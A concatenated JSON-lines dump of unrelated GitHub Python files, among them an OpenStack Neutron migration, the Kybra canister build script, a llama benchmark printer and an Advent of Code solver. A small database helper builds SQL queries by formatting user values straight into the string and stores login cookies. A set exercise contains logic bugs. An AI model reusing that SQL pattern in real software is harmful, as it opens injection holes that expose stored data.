by_number(state.data[transf_col],operation_type)\r\n\t\t\telif type_of_operations[1] == selection_of_type:\r\n\t\t\t\tN_cols_used = st.number_input('Select the number of columns that are going to be used', value = 2)\r\n\t\t\t\tif operation_type in ['Natural logarithm','Cosine','Sine','Tangent','root','logarithm']:\r\n\t\t\t\t\tst.write('Operation not supported between columns. Try \"Operation using a single number\"')\r\n\t\t\t\telse:\r\n\t\t\t\t\tcols = []\r\n\t\t\t\t\tfor i in range(N_cols_used):\r\n\t\t\t\t\t\tcols.append(st.selectbox('Column %i' %(i+1),[i for i in state.data.select_dtypes(exclude = 'O').columns if i not in cols]))\r\n\t\t\t\t\tnew_col = by_column(state.data[cols],operation_type)\r\n\t\t\tnew_col_name = st.text_input('Name your new column. If there you name it as some existing column it will replace the old one', value = 'New')\r\n\t\t\tstate.data[new_col_name] = new_col\r\n\t\telif st.checkbox('Complex mathematical operations'):\r\n\t\t\tst.write('**WORK IN PROGRESS**')\r\n\r\n#put new vector in the data\r\n\twith st.beta_expander(\"See complete data\"):\r\n\t\tst.write(state.data)\r\n\r\n\twith st.beta_expander(\"Data visualisation\"):\r\n\t\tst.write(\"here we will put multiple plots to help visualise your data\")\r\n\t\r\n\twith st.beta_expander(\"Prediciton\"):\r\n\t\tst.write('Here we will apply statistical modeling and artificial inteligence to create equations or to predict future values')\r\n\t\r\n\twith st.beta_expander('Report'):\r\n\t\tst.write('Here we will display or download a full report on your data')\r\n\t\r\n\t\r\n\r\n\t\t","repo_name":"Danielmoraisg/data_management","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8671149751","text":"from alembic import op\nfrom neutron.db import migration\nfrom neutron_lib.db import constants\n\nimport sqlalchemy as sa\n\n\n\"\"\"port forwarding rule description\nRevision ID: I43e0b669096\nRevises: 34cf8b009713\nCreate Date: 2021-12-02 10:00:00.000000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'I43e0b669096'\ndown_revision = '34cf8b009713'\n\nPF_TABLE_NAME = 'portforwardings'\npf_table = sa.Table(\n PF_TABLE_NAME, sa.MetaData(),\n sa.Column('id', sa.String(length=constants.UUID_FIELD_SIZE),\n nullable=False),\n sa.Column('socket', sa.String(length=36), nullable=False),\n sa.Column('external_port', sa.Integer(), nullable=False),\n sa.Column('internal_ip_address', sa.String(length=64), nullable=False),\n sa.Column('internal_port_start', sa.Integer(), nullable=False),\n sa.Column('external_port_start', sa.Integer(), nullable=False),\n sa.Column('internal_port_end', sa.Integer(), nullable=False),\n sa.Column('external_port_end', sa.Integer(), nullable=False),\n sa.Column('internal_neutron_port_id', sa.String(constants.UUID_FIELD_SIZE),\n nullable=False),\n)\n\n\ndef upgrade():\n op.add_column(PF_TABLE_NAME,\n sa.Column('internal_ip_address', sa.String(length=64),\n nullable=False))\n op.add_column(PF_TABLE_NAME, sa.Column('internal_port_start', sa.Integer(),\n nullable=False))\n op.add_column(PF_TABLE_NAME, sa.Column('internal_port_end', sa.Integer(),\n nullable=False))\n op.add_column(PF_TABLE_NAME, sa.Column('external_port_start', sa.Integer(),\n nullable=False))\n op.add_column(PF_TABLE_NAME, sa.Column('external_port_end', sa.Integer(),\n nullable=False))\n\n foreign_keys = clear_constraints_and_foreign()\n migrate_values()\n op.create_unique_constraint(\n columns=['floatingip_id', 'protocol',\n 'external_port_start', 'external_port_end'],\n constraint_name='uniq_port_forwardings0floatingip_id0protocol0'\n 'external_ports',\n table_name=PF_TABLE_NAME)\n\n op.create_unique_constraint(\n columns=['protocol', 'internal_neutron_port_id', 'internal_ip_address',\n 'internal_port_start', 'internal_port_end'],\n constraint_name='uniq_port_forwardings0ptcl0in_prt_id0in_ip_addr0'\n 'in_prts',\n table_name=PF_TABLE_NAME)\n\n op.drop_column(PF_TABLE_NAME, 'socket')\n\n op.drop_column(PF_TABLE_NAME, 'external_port')\n\n migration.create_foreign_keys(PF_TABLE_NAME, foreign_keys)\n\n\ndef clear_constraints_and_foreign():\n inspect = sa.inspect(op.get_bind())\n foreign_keys = inspect.get_foreign_keys(PF_TABLE_NAME)\n migration.remove_foreign_keys(PF_TABLE_NAME,\n foreign_keys)\n constraints_name = [\n 'uniq_port_forwardings0internal_neutron_port_id0socket0protocol',\n 'uniq_port_forwardings0floatingip_id0external_port0protocol']\n for constraint_name in constraints_name:\n op.drop_constraint(\n constraint_name=constraint_name,\n table_name=PF_TABLE_NAME,\n type_='unique'\n )\n\n return foreign_keys\n\n\ndef migrate_values():\n session = sa.orm.Session(bind=op.get_bind())\n values = []\n for row in session.query(pf_table):\n values.append({'id': row[0],\n 'socket': row[1],\n 'external_port': row[2]})\n\n for value in values:\n internal_ip_address, internal_port = str(\n value['socket']).split(':')\n external_port = value['external_port']\n internal_port = int(internal_port)\n session.execute(\n pf_table.update().values(\n internal_port_start=internal_port,\n internal_port_end=internal_port,\n external_port_start=external_port,\n external_port_end=external_port,\n internal_ip_address=internal_ip_address).where(\n pf_table.c.id == value['id']))\n session.commit()\n\n\ndef expand_drop_exceptions():\n \"\"\"Drop and replace the unique constraints for table portforwardings\n\n Drop the existing portforwardings foreign key uniq constraints and then\n replace them with new unique constraints with column ``protocol``.\n This is needed to use drop in expand migration to pass test_branches.\n \"\"\"\n\n return {\n sa.Column: [\n '%s.socket' % PF_TABLE_NAME,\n '%s.external_port' % PF_TABLE_NAME\n ],\n sa.Constraint: [\n \"portforwardings_ibfk_1\",\n \"portforwardings_ibfk_2\",\n \"portforwardings_ibfk_3\",\n \"portforwardings_ibfk_4\",\n \"uniq_port_forwardings0floatingip_id0external_port0protocol\",\n \"uniq_port_forwardings0internal_neutron_port_id0socket0protocol\",\n \"portforwardings_floatingip_id_fkey\",\n \"portforwardings_internal_neutron_port_id_fkey\",\n \"portforwardings_standard_attr_id_fkey\"\n ]\n }\n","repo_name":"openstack/neutron","sub_path":"neutron/db/migration/alembic_migrations/versions/zed/expand/I43e0b669096_port_forwarding_port_ranges.py","file_name":"I43e0b669096_port_forwarding_port_ranges.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"40139361368","text":"first_sequence = set([int(el) for el in input().split()])\nsecond_sequence = set([int(el) for el in input().split()])\n\nnumber = int(input())\n\nfor num in range(number):\n command = input().split()\n if command[0] == \"Add\":\n new_sequence = set([int(el) for el in command[2:]])\n if command[1] == \"First\":\n first_sequence.union(new_sequence)\n elif command[2] == \"Second\":\n second_sequence.union(new_sequence)\n elif command[0] == \"Remove\":\n new_sequence = set([int(el) for el in command[2:]])\n if command[1] == \"First\":\n first_sequence = first_sequence.difference(new_sequence)\n elif command[1] == \"Second\":\n second_sequence = second_sequence.difference(new_sequence)\n else:\n print(first_sequence.issubset(second_sequence) or second_sequence.issubset(first_sequence))\n\nprint(*sorted(first_sequence), sep=\", \")\nprint(*sorted(second_sequence), sep=\", \")\n","repo_name":"HristinaMateeva/software_engineering_path_softuni","sub_path":"03_python_advanced/02_exercises/03_stacks_queues_tuples_and_sets/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14666890563","text":"\"\"\"Output benchmark results.\"\"\"\n\nimport llama_bench\nimport pkg_resources\nimport os\nimport sysinfo\nfrom tabulate import tabulate\n\n\ndef print_header():\n \"\"\"Print benchmark header.\"\"\"\n print(\n f\"\"\"\nRacing Llama Benchmark\n\nSystem Information:\n{sysinfo.basic()}\"\"\"\n )\n\n\ndef print_results(results, parser, type=\"model\"):\n \"\"\"Print benchmark results.\n\n Args:\n results (dict): Benchmark results.\n \"\"\"\n print_header()\n if type == \"directory\":\n denorm = denormalize_results(results)\n print(\n f\"\"\"Runs: {parser.parse_args().runs}\nllama-cpp-python version: {pkg_resources.get_distribution(\"llama-cpp-python\").version}\nCPU Threads: {parser.parse_args().threads}\nGPU Acceleration: {parser.parse_args().gpu}\nSeed: {parser.parse_args().seed}\nPrompt: {parser.parse_args().prompt}\n\nEval Tokens per second:\n{create_table(denorm, \"eval\")}\n\nPrompt Tokens per second:\n{create_table(denorm, \"prompt\")}\n \"\"\"\n )\n else:\n print(\n f\"\"\"Runs: {parser.parse_args().runs}\nllama-cpp-python version: {pkg_resources.get_distribution(\"llama-cpp-python\").version}\nCPU Threads: {parser.parse_args().threads}\nGPU Acceleration: {parser.parse_args().gpu}\nModel: {os.path.basename(parser.parse_args().model)}\nSeed: {parser.parse_args().seed}\nPrompt: {parser.parse_args().prompt}\n{llama_bench.run_summary(results)}\n \"\"\"\n )\n\n\ndef denormalize_results(results):\n \"\"\"Denormalize benchmark results.\n\n Args:\n results (dict): Benchmark results.\n\n Returns:\n list: Denormalized benchmark results.\n \"\"\"\n table = []\n\n for result in results:\n table.append(\n {\n \"name\": result[\"name\"],\n \"parameters\": result[\"parameters\"],\n \"quant\": result[\"quant\"],\n \"eval_fastest\": result[\"data\"][\"eval\"][\"fastest\"],\n \"eval_slowest\": result[\"data\"][\"eval\"][\"slowest\"],\n \"eval_mean\": result[\"data\"][\"eval\"][\"mean\"],\n \"eval_median\": result[\"data\"][\"eval\"][\"median\"],\n \"prompt_fastest\": result[\"data\"][\"prompt\"][\"fastest\"],\n \"prompt_slowest\": result[\"data\"][\"prompt\"][\"slowest\"],\n \"prompt_mean\": result[\"data\"][\"prompt\"][\"mean\"],\n \"prompt_median\": result[\"data\"][\"prompt\"][\"median\"],\n }\n )\n return table\n\n\ndef create_table(denorm, type):\n \"\"\"Create table of benchmark results.\n\n Args:\n denorm (list): Denormalized benchmark results.\n type (str): Type of benchmark results.\n\n Returns:\n str: Table of benchmark results.\n \"\"\"\n table = [[\"Model\", \"Params\", \"Quant\", \"Fastest\", \"Slowest\", \"Mean\", \"Median\"]]\n\n for result in denorm:\n table.append(\n [\n result[\"name\"],\n result[\"parameters\"],\n result[\"quant\"],\n result[f\"{type}_fastest\"],\n result[f\"{type}_slowest\"],\n result[f\"{type}_mean\"],\n result[f\"{type}_median\"],\n ]\n )\n\n return tabulate(table, headers=\"firstrow\", tablefmt=\"github\")\n","repo_name":"leonh316/benchmark","sub_path":"rlb/output/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"34737518563","text":"total = maisdemil = cont = 0\nlst = []\nbarato = 999999999999999999999999999999999\nbname = ''\nwhile True:\n cont += 1\n print(f'produto {cont}')\n name = str(input('Nome: '))\n preço = int(input('Preço: '))\n total = total + preço\n if preço > 1000:\n maisdemil += 1\n if preço < barato:\n barato = preço\n bname = name\n G = str(input('Quer continuar?[S/N] ')).upper()\n if G == 'N':\n break\n\nprint(f'Preço total: R${total}\\n Quantidade de produtos de mais de mil reais: R${maisdemil}')\nprint(f'Produto mais barato: {bname}')\n","repo_name":"RaoniSilvestre/Exercicios-Python","sub_path":"mundo-2/ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4425385560","text":"import hopsworks\n\nproject = hopsworks.login()\n\n# create kafka topic\nKAFKA_TOPIC_NAME = \"credit_card_transactions\"\nSCHEMA_NAME = \"credit_card_transactions_schema\"\n\nkafka_api = project.get_kafka_api()\njob_api = project.get_jobs_api()\n\nschema = {\n \"type\": \"record\",\n \"name\": SCHEMA_NAME,\n \"namespace\": \"io.hops.examples.flink.examples\",\n \"fields\": [{\n \"name\": \"tid\",\n \"type\": [\"null\", \"string\"]\n }, {\n \"name\": \"datetime\",\n \"type\": [\"null\", \"long\"]\n }, {\n \"name\": \"cc_num\",\n \"type\": [\"null\", \"long\"]\n }, {\n \"name\": \"amount\",\n \"type\": [\"null\", \"double\"]\n }]\n}\n\nkafka_api.create_schema(SCHEMA_NAME, schema)\nkafka_api.create_topic(KAFKA_TOPIC_NAME, SCHEMA_NAME, 1, replicas=1, partitions=1)\n","repo_name":"logicalclocks/hopsworks-tutorials","sub_path":"integrations/java/flink/setup/kafka_topic.py","file_name":"kafka_topic.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"72"} +{"seq_id":"13251466456","text":"n=int(input())\ndef dice(L):\n i=1\n j=0\n L.sort()\n l=len(L)\n while (j str:\n main_command = f\"KYBRA_VERSION={kybra.__version__} $global_kybra_cargo_bin run --manifest-path=.kybra/{canister_name}/kybra_post_install/Cargo.toml {canister_name} {candid_path}\"\n main_command_not_verbose = f'exec 3>&1; output=$({main_command} 2>&1 1>&3 3>&-); exit_code=$?; exec 3>&-; if [ $exit_code -ne 0 ]; then echo \"$output\"; exit $exit_code; fi'\n\n return f\"\"\"#!/bin/bash\n\nrust_version=\"{rust_version}\"\n\nglobal_kybra_config_dir=~/.config/kybra\nglobal_kybra_rust_dir=\"$global_kybra_config_dir\"/rust/\"$rust_version\"\nglobal_kybra_rust_bin_dir=\"$global_kybra_rust_dir\"/bin\nglobal_kybra_logs_dir=\"$global_kybra_rust_dir\"/logs\nglobal_kybra_cargo_bin=\"$global_kybra_rust_bin_dir\"/cargo\nglobal_kybra_rustup_bin=\"$global_kybra_rust_bin_dir\"/rustup\n\nexport CARGO_TARGET_DIR=\"$global_kybra_config_dir\"/rust/target\nexport CARGO_HOME=\"$global_kybra_rust_dir\"\nexport RUSTUP_HOME=\"$global_kybra_rust_dir\"\n\necho \"\\nPreparing canister binaries for upload...\\n\"\n\n{main_command if is_verbose else main_command_not_verbose}\n \"\"\"\n\n\ndef parse_args_or_exit(args: list[str]) -> Args:\n args = args[1:] # Discard the path to kybra\n\n flags = [arg for arg in args if (arg.startswith(\"-\") or arg.startswith(\"--\"))]\n args = [arg for arg in args if not (arg.startswith(\"-\") or arg.startswith(\"--\"))]\n\n if len(args) == 0:\n print(f\"\\nkybra {kybra.__version__}\")\n print(\"\\nUsage: kybra [-v|--verbose] \")\n sys.exit(0)\n\n if len(args) != 3:\n print(red(\"\\n💣 Kybra error: wrong number of arguments\\n\"))\n print(\"Usage: kybra [-v|--verbose] \")\n print(\"\\n💀 Build failed!\")\n sys.exit(1)\n\n return {\n \"empty\": False,\n \"flags\": {\"verbose\": \"--verbose\" in flags or \"-v\" in flags},\n \"canister_name\": args[0],\n \"entry_point\": args[1],\n \"did_path\": args[2],\n }\n\n\ndef create_paths(args: Args) -> Paths:\n canister_name = args[\"canister_name\"]\n\n # This is the path to the developer's entry point Python file passed into python -m kybra from the dfx.json build command\n py_entry_file_path = args[\"entry_point\"]\n\n # This is the Python module name of the developer's Python project, derived from the entry point Python file passed into python -m kybra from the dfx.json build command\n py_entry_module_name = Path(py_entry_file_path).stem\n\n # This is the location of all code used to generate the final canister Rust code\n canister_path = f\".kybra/{canister_name}\"\n\n # We want to bundle/gather all Python files into the python_source directory for RustPython freezing\n # The location that Kybra will look to when running py_freeze!\n # py_freeze! will compile all of the Python code in the directory recursively (modules must have an __init__.py to be included)\n python_source_path = f\"{canister_path}/python_source\"\n\n py_file_names_file_path = f\"{canister_path}/py_file_names.csv\"\n\n # This is the path to the developer's Candid file passed into python -m kybra from the dfx.json build command\n did_path = args[\"did_path\"]\n\n # This is the path to the Kybra compiler Rust code delivered with the Python package\n compiler_path = os.path.dirname(kybra.__file__) + \"/compiler\"\n\n # This is the final generated Rust file that is the canister\n lib_path = f\"{canister_path}/src/lib.rs\"\n\n # This is the location of the Candid file generated from the final generated Rust file\n generated_did_path = f\"{canister_path}/index.did\"\n\n # This is the unzipped generated Wasm that is the canister\n wasm_path = f\"{canister_path}/{canister_name}.wasm\"\n\n # This is where we store custom Python modules, such as stripped-down versions of stdlib modules\n custom_modules_path = f\"{compiler_path}/custom_modules\"\n\n home_dir = os.path.expanduser(\"~\")\n global_kybra_config_dir = f\"{home_dir}/.config/kybra\"\n global_kybra_rust_dir = f\"{global_kybra_config_dir}/rust/{kybra.__rust_version__}\"\n global_kybra_rust_bin_dir = f\"{global_kybra_rust_dir}/bin\"\n global_kybra_target_dir = f\"{global_kybra_config_dir}/rust/target\"\n global_kybra_bin_dir = f\"{global_kybra_config_dir}/{kybra.__version__}/bin\"\n\n return {\n \"py_entry_file\": py_entry_file_path,\n \"py_entry_module_name\": py_entry_module_name,\n \"canister\": canister_path,\n \"python_source\": python_source_path,\n \"py_file_names_file\": py_file_names_file_path,\n \"did\": did_path,\n \"compiler\": compiler_path,\n \"lib\": lib_path,\n \"generated_did\": generated_did_path,\n \"wasm\": wasm_path,\n \"custom_modules\": custom_modules_path,\n \"global_kybra_config_dir\": global_kybra_config_dir,\n \"global_kybra_rust_dir\": global_kybra_rust_dir,\n \"global_kybra_rust_bin_dir\": global_kybra_rust_bin_dir,\n \"global_kybra_target_dir\": global_kybra_target_dir,\n \"global_kybra_bin_dir\": global_kybra_bin_dir,\n }\n\n\ndef detect_initial_compile(global_kybra_target_dir: str) -> bool:\n return not os.path.exists(global_kybra_target_dir)\n\n\n@timed_inline\ndef compile_python_or_exit(\n paths: Paths, cargo_env: dict[str, str], verbose: bool = False\n):\n bundle_python_code(paths)\n run_kybra_generate_or_exit(paths, cargo_env, verbose)\n run_rustfmt_or_exit(paths, cargo_env, verbose)\n\n\ndef encourage_patience(is_initial_compile: bool) -> str:\n return \" (be patient, this will take a while)\" if is_initial_compile else \"\"\n\n\ndef bundle_python_code(paths: Paths):\n # Begin module bundling/gathering process\n path = (\n list(filter(lambda x: x.startswith(os.getcwd()), sys.path))\n + [\n os.path.dirname(paths[\"py_entry_file\"]),\n ]\n + site.getsitepackages()\n )\n\n graph = modulegraph.modulegraph.ModuleGraph(path) # type: ignore\n entry_point = graph.run_script(paths[\"py_entry_file\"]) # type: ignore\n\n python_source_path = paths[\"python_source\"]\n\n if os.path.exists(python_source_path):\n shutil.rmtree(python_source_path)\n\n os.makedirs(python_source_path)\n\n # Copy our custom Python modules into the python_source directory\n shutil.copytree(paths[\"custom_modules\"], python_source_path, dirs_exist_ok=True)\n\n flattened_graph = list(graph.flatten(start=entry_point)) # type: ignore\n\n for node in flattened_graph: # type: ignore\n if type(node) == modulegraph.modulegraph.Script: # type: ignore\n shutil.copy(\n node.filename, f\"{python_source_path}/{os.path.basename(node.filename)}\" # type: ignore\n )\n\n if type(node) == modulegraph.modulegraph.SourceModule: # type: ignore\n shutil.copy(\n node.filename, f\"{python_source_path}/{os.path.basename(node.filename)}\" # type: ignore\n )\n\n if type(node) == modulegraph.modulegraph.Package: # type: ignore\n shutil.copytree(\n node.packagepath[0], # type: ignore\n f\"{python_source_path}/{node.identifier}\", # type: ignore\n dirs_exist_ok=True,\n ignore=ignore_specific_dir,\n )\n\n if type(node) == modulegraph.modulegraph.NamespacePackage: # type: ignore\n shutil.copytree(\n node.packagepath[0], # type: ignore\n f\"{python_source_path}/{node.identifier}\", # type: ignore\n dirs_exist_ok=True,\n ignore=ignore_specific_dir,\n )\n\n py_file_names = list( # type: ignore\n filter(\n lambda filename: filename is not None and filename.endswith(\".py\"), # type: ignore\n map(\n lambda node: node.filename, # type: ignore\n filter(\n lambda node: node.filename # type: ignore\n is not \"-\", # This filters out namespace packages\n flattened_graph, # type: ignore\n ), # type: ignore\n ), # type: ignore\n ) # type: ignore\n )\n\n create_file(paths[\"py_file_names_file\"], \",\".join(py_file_names)) # type: ignore\n\n\ndef ignore_specific_dir(dirname: str, filenames: list[str]) -> list[str]:\n if \"kybra_post_install/src/Lib\" in dirname:\n return filenames\n else:\n return []\n\n\ndef parse_kybra_generate_error(stdout: bytes) -> str:\n err = stdout.decode(\"utf-8\")\n std_err_lines = err.splitlines()\n try:\n line_where_error_message_starts = next(\n i\n for i, v in enumerate(std_err_lines)\n if v.startswith(\"thread 'main' panicked at '\")\n )\n line_where_error_message_ends = next(\n i for i, v in enumerate(std_err_lines) if \"', src/\" in v\n )\n except:\n return err\n\n err_lines = std_err_lines[\n line_where_error_message_starts : line_where_error_message_ends + 1\n ]\n err_lines[0] = err_lines[0].replace(\"thread 'main' panicked at '\", \"\")\n err_lines[-1] = re.sub(\"', src/.*\", \"\", err_lines[-1])\n\n return red(\"\\n\".join(err_lines))\n\n\ndef run_rustfmt_or_exit(paths: Paths, cargo_env: dict[str, str], verbose: bool = False):\n rustfmt_result = subprocess.run(\n [\n f\"{paths['global_kybra_rust_bin_dir']}/rustfmt\",\n \"--edition=2018\",\n paths[\"lib\"],\n ],\n capture_output=not verbose,\n env=cargo_env,\n )\n\n if rustfmt_result.returncode != 0:\n print(red(\"\\n💣 Kybra error: internal Rust formatting\"))\n print(\n f'\\nPlease open an issue at https://github.com/demergent-labs/kybra/issues/new\\nincluding this message and the following error:\\n\\n {red(rustfmt_result.stderr.decode(\"utf-8\"))}'\n )\n print(\"💀 Build failed\")\n sys.exit(1)\n\n\n@timed_inline\ndef optimize_wasm_binary_or_exit(\n paths: Paths, canister_name: str, cargo_env: dict[str, str], verbose: bool = False\n):\n optimization_result = subprocess.run(\n [\n f\"{paths['global_kybra_rust_bin_dir']}/ic-wasm\",\n f\"{paths['canister']}/{canister_name}_app.wasm\",\n \"-o\",\n f\"{paths['canister']}/{canister_name}_app.wasm\",\n \"shrink\",\n ],\n capture_output=not verbose,\n )\n\n if optimization_result.returncode != 0:\n print(red(\"\\n💣 Kybra error: optimizing generated Wasm\"))\n print(optimization_result.stderr.decode(\"utf-8\"))\n print(\"💀 Build failed\")\n sys.exit(1)\n\n add_metadata_to_wasm_or_exit(paths, canister_name, verbose=verbose)\n\n os.system(f\"gzip -9 -f -k {paths['canister']}/{canister_name}_app.wasm\")\n\n\ndef add_metadata_to_wasm_or_exit(\n paths: Paths, canister_name: str, verbose: bool = False\n):\n # TODO removing this until we solve the Candid issue: https://forum.dfinity.org/t/automatically-generate-candid-from-rust-sources/5924/34\n # TODO our current solution is to grab the Candid in post_install because of issues with Wasmer\n # TODO Unfortunately this means that on first deploy the candid:service metadata is incorrect\n # TODO thus we are relying on __get_candid_interface_tmp_hack for the time being\n # add_candid_to_wasm_result = subprocess.run(\n # [\n # f\"{paths['global_kybra_rust_bin_dir']}/ic-wasm\",\n # f\"{paths['canister']}/{canister_name}_app.wasm\",\n # \"-o\",\n # f\"{paths['canister']}/{canister_name}_app.wasm\",\n # \"metadata\",\n # \"candid:service\",\n # \"-f\",\n # paths[\"did\"],\n # \"-v\",\n # \"public\",\n # ],\n # capture_output=not verbose,\n # )\n\n # if add_candid_to_wasm_result.returncode != 0:\n # print(red(\"\\n💣 Kybra error: adding candid to Wasm\"))\n # print(add_candid_to_wasm_result.stderr.decode(\"utf-8\"))\n # print(\"💀 Build failed\")\n # sys.exit(1)\n\n add_cdk_info_to_wasm_result = subprocess.run(\n [\n f\"{paths['global_kybra_rust_bin_dir']}/ic-wasm\",\n f\"{paths['canister']}/{canister_name}_app.wasm\",\n \"-o\",\n f\"{paths['canister']}/{canister_name}_app.wasm\",\n \"metadata\",\n \"cdk\",\n \"-d\",\n f\"kybra {kybra.__version__}\",\n \"-v\",\n \"public\",\n ],\n capture_output=not verbose,\n )\n\n if add_cdk_info_to_wasm_result.returncode != 0:\n print(red(\"\\n💣 Kybra error: adding cdk name/version to Wasm\"))\n print(add_cdk_info_to_wasm_result.stderr.decode(\"utf-8\"))\n print(\"💀 Build failed\")\n sys.exit(1)\n\n\ndef show_empathy(is_initial_compile: bool) -> str:\n return (\n \" (❤ hang in there, this will be faster next time)\"\n if is_initial_compile\n else \"\"\n )\n\n\ndef create_file(file_path: str, contents: str):\n file = open(file_path, \"w\")\n file.write(contents)\n file.close()\n\n\ndef inline_timed(\n label: str,\n body: Callable[..., Any],\n *args: Any,\n verbose: bool = False,\n **kwargs: Any,\n) -> float:\n print(label)\n start_time = time.time()\n body(*args, verbose=verbose, **kwargs)\n end_time = time.time()\n duration = end_time - start_time\n\n if verbose:\n print(f\"{label} finished in {round(duration, 2)}s\")\n else:\n move_cursor_up_one_line = \"\\x1b[1A\"\n print(f'{move_cursor_up_one_line}{label} {dim(f\"{round(duration, 2)}s\")}')\n\n return end_time - start_time\n\n\nmain()\n","repo_name":"demergent-labs/kybra","sub_path":"kybra/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":16647,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"9690282964","text":"from .DB_user import link\n\n\ndef insert_jwxt(qq_number, cookie):\n sql = \"insert into jwxt values('%s','%s')\" % (cookie, qq_number)\n print(sql)\n con = link()\n cursor = con.cursor()\n try:\n cursor.execute(sql)\n con.commit()\n except Exception as e:\n print(e)\n con.rollback()\n\n\ndef user_check(qq_number):\n try:\n sql = \"select qq_number from jwxt where qq_number = '%s'\" % qq_number\n con = link()\n cursor = con.cursor()\n cursor.execute(sql)\n result_QQ = cursor.fetchone()\n con.close()\n if result_QQ is None:\n return False\n else:\n return True\n except Exception as e:\n return -1\n\ndef get_cookie(qq_number):\n try:\n sql = \"select cookie from jwxt where qq_number = '%s'\" % qq_number\n con = link()\n cursor = con.cursor()\n cursor.execute(sql)\n cookie = cursor.fetchone()\n con.close()\n if cookie is None:\n return False\n else:\n return cookie[0]\n except Exception as e:\n return -1","repo_name":"takanashi-shiro/Xishun_UI_based_on_Kivy","sub_path":"database/jwxt_DB.py","file_name":"jwxt_DB.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"16853048189","text":"from __future__ import annotations\n# from typing_extensions import Self\n\nimport heapq\nimport re\nfrom dataclasses import dataclass\nimport argparse\nimport os.path\nimport itertools\n\nimport pytest\nimport support\n\nINPUT_TXT = os.path.join(os.path.dirname(__file__), 'input.txt')\n\n\n@dataclass\nclass Valve:\n name: str\n flow_rate: int\n paths: list[str]\n is_open: bool = False\n is_visited: bool = False\n\n def __hash__(self):\n return hash(self.name)\n\n def __eq__(self, other):\n return self.name == other.name\n\n def potential(self, minutes_remaining: int):\n if self.is_open:\n return 0\n return self.flow_rate * minutes_remaining\n\n\n\nclass Valves:\n valves: frozenset[Valve]\n minutes_remaining: int\n\n def __init__(self, valves, minutes_remaining: int = 30):\n self.valves = valves\n self.minutes_remaining = minutes_remaining\n\n def get(self, name: str):\n try:\n return next(filter(lambda v: v.name == name, self.valves))\n except StopIteration:\n raise ValueError(f'No valve exists with name {name}')\n\n def dist(self, v1s: str, v2s: str):\n \"\"\"Calculated distance between two valves, using their names\"\"\"\n if v1s == v2s:\n return 0\n v1, v2 = self.get(v1s), self.get(v2s)\n queue: list[Valve] = list()\n for i, p in enumerate(v1.paths):\n heapq.heappush(queue, (1, i, set(), self.get(p)))\n while queue:\n val: tuple[int, int, set[Valve], Valve] = heapq.heappop(queue)\n dist, _, visited, v = val\n if v == v2:\n return dist\n else:\n visited.add(v)\n for pth in v.paths:\n i += 1\n if self.get(pth) not in visited:\n heapq.heappush(queue, (dist + 1, i, visited, self.get(pth)))\n raise AssertionError('There should be no stranded valves')\n\nregexp = re.compile(r\"^Valve (?P[A-Z]+) has flow rate=(?P[0-9]+); \\w+ \\w+ to \\w+ (?P[\\w, ]+)$\")\n\n\ndef compute(s: str) -> int:\n ls = s.strip().splitlines()\n closed_valves: set[Valve] = set()\n for ln in ls:\n match = regexp.match(ln.strip())\n vlv = Valve(name=match.group(\"name\"), flow_rate=int(match.group(\"flow_rate\")), paths=[p.strip() for p in match.group(\"valves\").split(',')])\n closed_valves.add(vlv)\n v = Valves(closed_valves)\n interesting_valves = [\"AA\"] + [vv.name for vv in closed_valves if vv.flow_rate > 0]\n d = {}\n for a, b in itertools.combinations(interesting_valves, 2):\n d[(a, b)] = v.dist(a, b)\n d[(b, a)] = v.dist(a, b)\n flow_rates = {vv.name: vv.flow_rate for vv in closed_valves}\n queue = list()\n max_pressure = -1\n queue = [(0, 30, ('AA',),)]\n while queue:\n pressure, time, route = queue.pop()\n cur_valve = route[-1]\n if pressure > max_pressure:\n max_pressure = pressure\n for to_open in set(interesting_valves) - set(route):\n if d[(cur_valve, to_open)] < time:\n remaining_time = time - d[(cur_valve, to_open)] - 1\n queue.append((\n pressure + flow_rates[to_open] * remaining_time,\n remaining_time,\n route + (to_open,)\n ))\n return max_pressure\n\n\nINPUT_S = '''\\\nValve AA has flow rate=0; tunnels lead to valves DD, II, BB\nValve BB has flow rate=13; tunnels lead to valves CC, AA\nValve CC has flow rate=2; tunnels lead to valves DD, BB\nValve DD has flow rate=20; tunnels lead to valves CC, AA, EE\nValve EE has flow rate=3; tunnels lead to valves FF, DD\nValve FF has flow rate=0; tunnels lead to valves EE, GG\nValve GG has flow rate=0; tunnels lead to valves FF, HH\nValve HH has flow rate=22; tunnel leads to valve GG\nValve II has flow rate=0; tunnels lead to valves AA, JJ\nValve JJ has flow rate=21; tunnel leads to valve II\n'''\nEXPECTED = 1651\n\n\n@pytest.mark.parametrize(\n ('input_s', 'expected'),\n (\n (INPUT_S, EXPECTED),\n ),\n)\ndef test(input_s: str, expected: int) -> None:\n assert compute(input_s) == expected\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument('data_file', nargs='?', default=INPUT_TXT)\n args = parser.parse_args()\n with open(args.data_file) as f, support.timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == '__main__':\n raise SystemExit(main())","repo_name":"bejoinka/aoc2022","sub_path":"day16/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 